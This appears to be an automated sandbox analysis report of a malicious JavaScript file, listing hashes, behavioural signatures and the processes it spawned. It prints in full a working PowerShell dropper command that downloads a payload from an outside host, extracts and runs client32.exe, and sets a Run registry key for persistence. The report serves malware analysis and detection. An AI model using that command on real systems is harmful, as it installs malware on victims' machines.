Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20230712-en -
resource tags
arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system -
submitted
29/08/2023, 08:21
Static task
static1
Behavioral task
behavioral1
Sample
229122912291.js
Resource
win7-20230712-en
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
229122912291.js
Resource
win10v2004-20230703-en
10 signatures
150 seconds
General
-
Target
229122912291.js
-
Size
3KB
-
MD5
0632bc0a930491c5232dafbb3d4d2bf8
-
SHA1
de9c86da5b0a3961baef803c483b7815957d429b
-
SHA256
7e630371fe8015da34a33370dafc9da2bae45531a4376fd5053a45d8193b4c15
-
SHA512
b5d84a0ff5ad63337e7e8cefea56403cd77f8243a2c4ef28a0f5b702eb180e40ec4b5a5cfaffd230394e413b620e343629c0e104c8b7c4185a687ebe8eb3b23d
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://instalfrio.cl/destination.txt
exe.dropper
http://instalfrio.cl/destination.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2896 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2896 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2896 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2676 wrote to memory of 2896 2676 wscript.exe 28 PID 2676 wrote to memory of 2896 2676 wscript.exe 28 PID 2676 wrote to memory of 2896 2676 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\229122912291.js1⤵
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C "$u='http://instalfrio.cl/destination.txt';$6=(New-Object System.Net.WebClient).DownloadString($u);$a=[System.Convert]::FromBase64String($6);$d=[System.Environment]::GetFolderPath('ApplicationData')+'\D';if (!(Test-Path $d -PathType Container)) { New-Item -Path $d -ItemType Directory };$p=Join-Path $d 'p.zip';[System.IO.File]::WriteAllBytes($p,$a);try { Add-Type -A System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($p,$d)} catch { Write-Host 'Failed: ' + $_; exit};$e=Join-Path $d 'client32.exe';if (Test-Path $e -PathType Leaf) { Start-Process -FilePath $e} else { Write-Host 'No exe.'};$s=$d+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='X';$t='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $t;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2896
-